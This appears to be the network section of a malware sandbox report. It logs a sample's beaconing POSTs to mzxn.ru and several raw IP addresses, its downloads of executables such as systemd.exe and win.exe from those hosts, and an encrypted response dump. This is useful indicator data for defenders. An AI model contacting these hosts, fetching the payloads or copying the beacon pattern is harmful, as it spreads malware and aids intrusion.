Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nfdfhrsebwtpak.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nbjnvxjkhmqxikmf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://aqikanflflrl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xulyufyklyfdh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://foijjivakijcspuj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nbeolaysbixye.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lodrwjryqookcn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fbsckrfixku.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: mzxn.ru
Source: global traffic	HTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uafdxvcfkgfo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rbkrqeaeqwvdi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gbvtererkqfobu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://icugirctwrbhpuq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qnovtwajiclq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: mzxn.ru
Source: global traffic	HTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qrsqtwgtiasbuo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qgdbhmlcsptqb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ohroqjqgvdh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://swfkahecbiykwi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fbuadeoajebihl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lsufwulnegxqsvy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bluhmqewincunud.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://frvkldaekrdbt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mqumylcqnaa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mqumylcqnaa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: mzxn.ruData Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 51 2f c0 f6 6a 4a e3 af 9a 55 7e 8b ae af 81 de 0d 75 c2 f9 8a a3 aa 6d dc e7 a6 25 dd 44 59 76 78 0b 7b e2 5f f2 2d 1a 86 a2 c5 df bf d8 5f 32 c4 84 dc 5f ed 2e 93 50 80 1a 94 46 74 5b b9 1f 32 c2 0c 74 58 37 c8 4d bf f5 a2 be 99 cd 83 cf dc 33 88 96 b2 0f 64 80 3f 73 bb 8c 41 9d 13 5b 49 e5 f3 db fb dd a0 95 80 98 d0 7c 73 aa ba cb 59 e7 b7 cd 37 98 21 df ea 94 8a 8d ba bf 8e 2e 32 99 bf e0 29 74 98 8e ee 24 76 90 f2 1f d8 6f 5e 48 ee 10 e6 bb ba 2a e5 c2 55 08 1c e0 52 02 b9 b4 4c 8f 21 0c f7 eb a2 cb ec 72 b9 dc fc 53 fb 16 88 33 62 8f aa b3 24 d8 2e 11 ea 31 5b 68 9a 60 7e 81 89 d6 2e bc 20 bf 54 a5 f7 36 8c 75 31 10 11 47 81 b3 56 4f a2 d3 73 f1 f3 33 5a Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vuQ/jJU~um%DYvx{_-_2_.PFt[2tX7M3d?sA[I\|sY7!.2)t$vo^H*URL!rS3b$.1[h`~. T6u1GVOs3Z
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wvcpcwinaogm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 144Host: mzxn.ru
Source: global traffic	HTTP traffic detected: GET /build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 109.172.114.212
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qtgvwwvtuns.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nrlmldyquiidbru.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iidaiysfdtd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ggwxsequudqgaxcf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sqxnnumhnssm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ctqgxbikusofytgf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dbybeunkxlc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: mzxn.ru

Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
